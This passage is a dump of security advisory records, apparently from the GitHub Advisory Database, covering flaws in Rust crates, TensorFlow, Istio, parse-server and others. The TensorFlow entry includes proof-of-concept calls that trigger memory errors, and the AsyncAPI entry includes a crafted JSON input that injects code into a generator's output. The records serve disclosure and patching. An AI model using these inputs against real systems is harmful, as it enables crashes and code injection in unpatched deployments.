+1.4.0,GHSA-gvcp-948f-8f2p,2021-08-18T19:04:08Z,2021-08-25T20:59:04Z,,['CVE-2020-36443'],Use of Uninitialized Resource in libp2p-deflate,"An issue was discovered in the libp2p-deflate crate before 0.27.1 for Rust. An uninitialized buffer is passed to AsyncRead::poll_read(), which is a user-provided trait function.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'libp2p-deflate'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.27.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36443'}, {'type': 'PACKAGE', 'url': 'https://github.com/libp2p/rust-libp2p'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0123.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T22:18:41Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-pfjq-935c-4895,2023-06-13T22:27:40Z,2021-08-25T21:00:37Z,,[],Data races in v9,"Affected versions of this crate unconditionally implement `Sync` for `SyncRef`. This definition allows data races if `&T` is accessible through `&SyncRef`. + +`SyncRef` derives `Clone` and `Debug`, and the default implementations of those traits access `&T` by invoking `T::clone()` & `T::fmt()`. It is possible to create data races & undefined behavior by concurrently invoking `SyncRef::clone()` or `SyncRef::fmt()` from multiple threads with `T: !Sync`. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'v9'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.43'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/purpleposeidon/v9/issues/1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0127.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T21:37:57Z', 'nvd_published_at': None}" +1.4.0,GHSA-9xjr-m6f3-v5wm,2023-06-13T17:38:19Z,2021-08-25T20:43:06Z,,['CVE-2016-10932'],HTTPS MitM vulnerability due to lack of hostname verification,"When used on Windows platforms, all versions of Hyper prior to 0.9.4 did not perform hostname verification when making HTTPS requests. + +This allows an attacker to perform MitM attacks by preventing any valid CA-issued certificate, even if there's a hostname mismatch. + +The problem was addressed by leveraging rust-openssl's built-in support for hostname verification.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'hyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10932'}, {'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/issues/472'}, {'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/commit/01160abd92956e5f995cc45790df7a2b86c8989f'}, {'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/blob/master/CHANGELOG.md#v094-2016-05-09'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2016-0002.html'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:25:12Z', 'nvd_published_at': None}" +1.4.0,GHSA-hr3c-6mmp-6m39,2023-06-13T20:55:45Z,2021-08-25T20:42:57Z,,['CVE-2018-20995'],Memory corruption slice-deque,"Affected versions of this crate did not properly update the head and tail of the deque when inserting and removing elements from the front if, before insertion or removal, the tail of the deque was in the mirrored memory region, and if, after insertion or removal, the head of the deque is exactly at the beginning of the mirrored memory region. + +An attacker that controls both element insertion and removal into the deque could put it in a corrupted state. Once the deque enters such an state, its head and tail are corrupted, but in bounds of the allocated memory. This can result in partial reads and writes, reads of uninitialized memory, reads of memory containing previously dropped objects, etc. An attacker could exploit this to alter program execution. + +The flaw was corrected by properly updating the head and tail of the deque in this case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'slice-deque'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20995'}, {'type': 'WEB', 'url': 'https://github.com/gnzlbg/slice_deque/issues/57'}, {'type': 'PACKAGE', 'url': 'https://github.com/gnzlbg/slice_deque'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0008.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:25:30Z', 'nvd_published_at': None}" +1.4.0,GHSA-5q2r-92f9-4m49,2021-10-27T17:03:38Z,2021-08-25T20:56:55Z,,['CVE-2020-15093'],Improper verification of signature threshold in tough,"## Impact + +The tough library, prior to 0.7.1, does not properly verify the uniqueness of keys in the signatures provided to meet the threshold of cryptographic signatures. It allows someone with access to a valid signing key to create multiple valid signatures in order to circumvent TUF requiring a minimum threshold of unique keys before the metadata is considered valid. + +AWS would like to thank Erick Tryzelaar of the Google Fuchsia Team for reporting this issue. + +## Patches + +A fix is available in version 0.7.1. + +## Workarounds + +No workarounds to this issue are known. + +## References + +CVE-2020-6174 is assigned to the same issue in the TUF reference implementation. + +https://github.com/theupdateframework/tuf/pull/974 +https://nvd.nist.gov/vuln/detail/CVE-2020-6174 + +## For more information + +If you have any questions or comments about this advisory, [contact AWS Security](https://aws.amazon.com/security/vulnerability-reporting/) at [aws-security@amazon.com](mailto:aws-security@amazon.com).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tough'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/awslabs/tough/security/advisories/GHSA-5q2r-92f9-4m49'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15093'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/pull/974'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/tuf/commit/2977188139d065ff3356c3cb4aec60c582b57e0e'}, {'type': 'PACKAGE', 'url': 'https://github.com/awslabs/tough'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0024.html'}]","{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:40:25Z', 'nvd_published_at': '2020-07-09T19:15:00Z'}" +1.4.0,GHSA-gh6x-4whr-2qv4,2021-08-23T18:18:09Z,2021-08-25T14:44:05Z,,['CVE-2021-37639'],Null pointer dereference and heap OOB read in operations restoring tensors,"### Impact +When restoring tensors via raw APIs, if the tensor name is not provided, TensorFlow can be tricked into dereferencing a null pointer: + +```python +import tensorflow as tf + +tf.raw_ops.Restore( + file_pattern=['/tmp'], + tensor_name=[], + default_value=21, + dt=tf.int, + preferred_shard=1) +``` + +The same undefined behavior can be triggered by `tf.raw_ops.RestoreSlice`: + +```python +import tensorflow as tf + +tf.raw_ops.RestoreSlice( + file_pattern=['/tmp'], + tensor_name=[], + shape_and_slice='2', + dt=inp.array([tf.int]), + preferred_shard=1) +``` + +Alternatively, attackers can read memory outside the bounds of heap allocated data by providing some tensor names but not enough for a successful restoration: + +```python +import tensorflow as tf + +tf.raw_ops.Restore( + file_pattern=['/tmp'], + tensor_name=['x'], + default_value=21, + dt=tf.int, + preferred_shard=42) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/47a06f40411a69c99f381495f490536972152ac0/tensorflow/core/kernels/save_restore_tensor.cc#L158-L159) retrieves the tensor list corresponding to the `tensor_name` user controlled input and immediately retrieves the tensor at the restoration index (controlled via `preferred_shard` argument). This occurs without validating that the provided list has enough values. + +If the list is empty this results in dereferencing a null pointer (undefined behavior). If, however, the list has some elements, if the restoration index is outside the bounds this results in heap OOB read. + +### Patches +We have patched the issue in GitHub commit [9e82dce6e6bd1f36a57e08fa85af213e2b2f2622](https://github.com/tensorflow/tensorflow/commit/9e82dce6e6bd1f36a57e08fa85af213e2b2f2622). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gh6x-4whr-2qv4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37639'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/9e82dce6e6bd1f36a57e08fa85af213e2b2f2622'}]","{'cwe_ids': ['CWE-125', 'CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:18:09Z', 'nvd_published_at': '2021-08-12T19:15:00Z'}" +1.4.0,GHSA-rxr4-x558-x7hw,2023-06-13T20:58:32Z,2021-08-25T20:42:54Z,,['CVE-2018-20991'],Double free in smallvec,"If an iterator passed to SmallVec::insert_many panicked in Iterator::next, destructors were run during unwinding while the vector was in an inconsistent state, possibly causing a double free (a destructor running on two copies of the same value). + +This is fixed in smallvec 0.6.3 by ensuring that the vector's length is not updated to include moved items until they have been removed from their original positions. Items may now be leaked if Iterator::next panics, but they will not be dropped more than once.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'smallvec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.2'}, {'fixed': '0.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20991'}, {'type': 'WEB', 'url': 'https://github.com/servo/rust-smallvec/issues/96'}, {'type': 'PACKAGE', 'url': 'https://github.com/servo/rust-smallvec'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0003.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:25:34Z', 'nvd_published_at': None}" +1.4.0,GHSA-qf76-pr7x-h7r4,2021-04-22T23:02:07Z,2021-08-02T16:38:01Z,,['CVE-2020-19676'],Incorrect Access Control in Nacos,Nacos 1.1.4 is affected by: Incorrect Access Control. An environment can be set up locally to get the service details interface. Then other Nacos service names can be accessed through the service list interface. Service details can then be accessed when not logged in. (detail:https://github.com/alibaba/nacos/issues/2284),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.alibaba.nacos:nacos-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-19676'}, {'type': 'WEB', 'url': 'https://github.com/alibaba/nacos/issues/1105'}, {'type': 'WEB', 'url': 'https://github.com/alibaba/nacos/issues/2284'}, {'type': 'WEB', 'url': 'https://github.com/alibaba/nacos/releases/tag/1.2.0'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-22T23:02:07Z', 'nvd_published_at': '2020-09-30T18:15:00Z'}" +1.4.0,GHSA-3w8g-xr3f-2mp8,2021-08-24T18:08:59Z,2021-08-25T20:55:49Z,,['CVE-2021-38190'],Out of bounds write in nalgebra,"The `Deserialize` implementation for `VecStorage` did not maintain the invariant that the number of elements must equal `nrows * ncols`. Deserialization of specially crafted inputs could allow memory access beyond allocation of the vector. + +This flaw was introduced in v0.11.0 ([`086e6e`](https://github.com/dimforge/nalgebra/commit/086e6e719f53fecba6dadad2e953a487976387f5)) due to the addition of an automatically derived implementation of `Deserialize` for `MatrixVec`. `MatrixVec` was later renamed to `VecStorage` in v0.16.13 ([`0f66403`](https://github.com/dimforge/nalgebra/commit/0f66403cbbe9eeac15cedd8a906c0d6a3d8841f2)) and continued to use the automatically derived implementation of `Deserialize`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'nalgebra'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '0.27.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38190'}, {'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/issues/883'}, {'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/pull/889'}, {'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/commit/a803271fcce75b7c151e92aa099dfa546db4adc5'}, {'type': 'PACKAGE', 'url': 'https://github.com/dimforge/nalgebra'}, {'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/blob/dev/CHANGELOG.md#0270'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0070.html'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:30:58Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-vcw4-8ph6-7vw8,2023-06-13T20:47:54Z,2021-08-25T20:54:20Z,,['CVE-2021-29935'],Use after free in Rocket,"Affected versions of this crate transmuted a &str to a &'static str before pushing it into a StackVec, this value was then popped later in the same function. + +This was assumed to be safe because the reference would be valid while the method's stack was active. In between the push and the pop, however, a function f was called that could invoke a user provided function. + +If the user provided panicked, then the assumption used by the function was no longer true and the transmute to &'static would create an illegal static reference to the string. This could result in a freed string being used during (such as in a Drop implementation) or after (e.g through catch_unwind) the panic unwinding. + +This flaw was corrected in commit `e325e2f` by using a guard object to ensure that the &'static str was dropped inside the function.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rocket'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29935'}, {'type': 'WEB', 'url': 'https://github.com/SergioBenitez/Rocket/issues/1534'}, {'type': 'WEB', 'url': 'https://github.com/SergioBenitez/Rocket/commit/b53a906a8e170fe9b151381c66a76a872c419f9e'}, {'type': 'WEB', 'url': 'https://github.com/SergioBenitez/Rocket/commit/e325e2fce4d9f9f392761e9fb58b418a48cef8bb'}, {'type': 'PACKAGE', 'url': 'https://github.com/SergioBenitez/Rocket'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0044.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:09:45Z', 'nvd_published_at': None}" +1.4.0,GHSA-23r4-5mxp-c7g5,2022-08-15T20:04:54Z,2021-08-23T19:41:52Z,,['CVE-2021-39138'],parse-server new anonymous user session acts as if it's created with password,"### Impact + +Developers that use the REST API to signup users and also allow users to login anonymously. When an anonymous user is first signed up using REST, the server creates session incorrectly, particularly the `authProvider` field in `_Session` class under `createdWith` shows the user logged in creating a password. If a developer later depends on the `createdWith` field to provide a different level of access between a password user and anonymous user, the server incorrectly classified the session type as being created with a `password`. + +The server currently doesn't use `createdWith` to make decisions on how things work internally, so if a developer isn't using `createdWith` directly, there's nothing to worry about. The vulnerability only affects users who depend on `createdWith` by using it directly. + +### Patches +Upgrade to version 4.5.1. + +### Workarounds +Don't use the `createdWith` Session field to make decisions if you allow anonymous login. + +### References +n/a","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/security/advisories/GHSA-23r4-5mxp-c7g5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39138'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/commit/147bd9a3dc43391e92c36e05d5db860b04ca27db'}, {'type': 'PACKAGE', 'url': 'https://github.com/parse-community/parse-server'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/releases/tag/4.5.2'}]","{'cwe_ids': ['CWE-287', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:07:34Z', 'nvd_published_at': '2021-08-19T16:15:00Z'}" +1.4.0,GHSA-7774-7vr3-cc8j,2021-12-13T13:09:54Z,2021-08-30T16:15:56Z,,['CVE-2021-39155'],Authorization Policy Bypass Due to Case Insensitive Host Comparison,"### Impact +According to [RFC 4343](https://datatracker.ietf.org/doc/html/rfc4343), Istio authorization policy should compare the hostname in the HTTP Host header in a case insensitive way, but currently the comparison is case sensitive. The Envoy proxy will route the request hostname in a case-insensitive way which means the authorization policy could be bypassed. + +As an example, the user may have an authorization policy that rejects request with hostname ""httpbin.foo"" for some source IPs, but the attacker can bypass this by sending the request with hostname ""Httpbin.Foo"". + +### Patches +* Istio 1.11.1 and above +* Istio 1.10.4 and above +* Istio 1.9.8 and above + +### Workarounds +A Lua filter may be written to normalize Host header before the authorization check. This is similar to the Path normalization presented in the [Security Best Practices](https://istio.io/latest/docs/ops/best-practices/security/#case-normalization) guide. + +### References +More details can be found in the [Istio Security Bulletin](https://istio.io/latest/news/security/istio-security-2021-008). + +### For more information +If you have any questions or comments about this advisory, please email us at istio-security-vulnerability-reports@googlegroups.com +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'istio.io/istio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'istio.io/istio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.0'}, {'fixed': '1.10.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'istio.io/istio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.11.1'}]}], 'versions': ['1.11.0']}]","[{'type': 'WEB', 'url': 'https://github.com/istio/istio/security/advisories/GHSA-7774-7vr3-cc8j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39155'}, {'type': 'WEB', 'url': 'https://github.com/istio/istio/commit/084b417a486dbe9b9024d4812877016a484572b1'}, {'type': 'WEB', 'url': 'https://github.com/istio/istio/commit/76ed51413ddd2a7fa253a368ab20a9cec5fb1cbe'}, {'type': 'WEB', 'url': 'https://github.com/istio/istio/commit/90b00bdf891e6c770cb3235c14a9b1fda96cc7c5'}, {'type': 'WEB', 'url': 'https://datatracker.ietf.org/doc/html/rfc4343'}, {'type': 'PACKAGE', 'url': 'https://github.com/istio/istio'}]","{'cwe_ids': ['CWE-178'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T22:29:16Z', 'nvd_published_at': '2021-08-24T23:15:00Z'}" +1.4.0,GHSA-cgmg-2v6m-fjg7,2021-08-19T18:53:20Z,2021-08-25T20:50:41Z,,['CVE-2020-36210'],Free of uninitialized memory in autorand,"An issue was discovered in the autorand crate before 0.2.3 for Rust. Because of impl Random on arrays, uninitialized memory can be dropped when a panic occurs, leading to memory corruption.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'autorand'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36210'}, {'type': 'WEB', 'url': 'https://github.com/mersinvald/autorand-rs/issues/5'}, {'type': 'PACKAGE', 'url': 'https://github.com/mersinvald/autorand-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0103.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:53:20Z', 'nvd_published_at': None}" +1.4.0,GHSA-xj6r-2jpm-qvxp,2021-08-24T18:50:59Z,2021-08-25T14:45:52Z,,['CVE-2021-37694'],Code injection issue for java-spring-cloud-stream-template,"The following was initially reported by @jonaslagoni: + +Given the following command: +`ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output` + +With the following AsyncAPI document: +```json +{ + ""asyncapi"": ""2.0.0"", + ""info"": { + ""title"": ""Streetlight"", + ""version"": ""1.0.0"" + }, + ""defaultContentType"": ""json"", + ""channels"": { + ""security/audit/channel"": { + ""description"": ""Channel for the turn on command which should turn on the streetlight"", + ""parameters"": { + ""streetlight_id"": { + ""description"": ""The ID of the streetlight"", + ""schema"": { + ""type"": ""string"" + } + } + }, + ""publish"": { + ""operationId"": ""test() { System.out.println(\""injected\""); return test(0); }\n public Consumer someothername"", + ""message"": { + ""name"": ""TurnonCommand"", + ""payload"": { + ""$ref"": ""#/components/schemas/CustomClass"" + } + } + } + } + }, + ""components"": { + ""schemas"" : { + ""CustomClass"": { + ""type"": ""object"", + ""properties"": { + ""prop"": { + ""type"": ""string"" + } + } + } + } + } +} +``` + +Which changes the following output: + +```java +... + @Bean + public Consumer test() { + // Add business logic here. + return null; + } +... +``` +To +```java +... + @Bean + public Consumer test() { System.out.println(""injected""); return someothername(); } + public Consumer someothername() { + // Add business logic here. + return null; + } +... +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@asyncapi/java-spring-cloud-stream-template'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.6.9'}}]","[{'type': 'WEB', 'url': 'https://github.com/asyncapi/java-spring-cloud-stream-template/security/advisories/GHSA-xj6r-2jpm-qvxp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37694'}, {'type': 'PACKAGE', 'url': 'https://github.com/asyncapi/java-spring-cloud-stream-template'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T18:50:59Z', 'nvd_published_at': '2021-08-11T18:15:00Z'}" +1.4.0,GHSA-9frf-r7c7-j2vg,2023-06-13T20:54:15Z,2021-08-25T20:54:14Z,,['CVE-2021-29939'],Out of bounds write in stackvector,"StackVec::extend used the lower and upper bounds from an Iterator's size_hint to determine how many items to push into the stack based vector. If the size_hint implementation returned a lower bound that was larger than the upper bound, StackVec would write out of bounds and overwrite memory on the stack. As mentioned by the size_hint documentation, size_hint is mainly for optimization and incorrect implementations should not lead to memory safety issues.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'stackvector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29939'}, {'type': 'WEB', 'url': 'https://github.com/Alexhuszagh/rust-stackvector/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/Alexhuszagh/rust-stackvector'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0048.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:15:11Z', 'nvd_published_at': '2021-04-01T05:15:00Z'}" +1.4.0,GHSA-xm9f-vxmx-4m58,2021-08-30T16:42:38Z,2021-08-30T17:20:41Z,,['CVE-2021-32759'],Data Flow Sanitation Issue Fix ,"### Impact +Due to missing sanitation in data flow it was possible for admin users to upload arbitrary executable files to the server.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.15'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.13'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/security/advisories/GHSA-xm9f-vxmx-4m58'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32759'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/commit/34709ac642d554aa1824892059186dd329db744b'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/releases/tag/v19.4.15'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/releases/tag/v20.0.13'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T16:42:38Z', 'nvd_published_at': '2021-08-27T22:15:00Z'}" +1.4.0,GHSA-v666-6w97-pcwm,2021-08-02T21:55:20Z,2021-08-25T21:01:21Z,,[],Miner fails to get block template when a cell used as a cell dep has been destroyed.,"### Impact + +The RPC `get_block_template` fails when a cell has been used as a cell dep and an input in the different transactions. + +Say cell C is used as a dep group in the transaction A, and is destroyed in the transaction B. + +The node adds transaction A first, then B into the transaction pool. They are both valid. But when generating the block template, if the fee rate of B is higher, it comes before A, which will invalidate A. Currently the RPC `get_block_template` will fail instead of dropping A. + +### Patch + +First, the `get_block_template` should not fail but dropping the conflict transactions. + +Then we can propose solution to this issue. Here is an example. When a transaction is added to the pool, the pool must consider it depending on all the transactions which dep cell (direct or indirect via dep group) has been destroyed in this transaction. Because future transactions using the destroyed cells as dep will be rejected, the spending transaction only need to wait for all the existing dep transactions on chain. + +### Workaround + +1. Submit transaction B when A is already on chain. +2. Let B depend on A explicitly, there are several solutions: + * a. Add any output cell on A as a dep cell or input in B. + * b. Merge A and B. CKB allows using the same cell as both dep and input in the same transaction. +3. Ensure the fee rate of B is less than A so A always has higher priority. +",[],"[{'package': {'ecosystem': 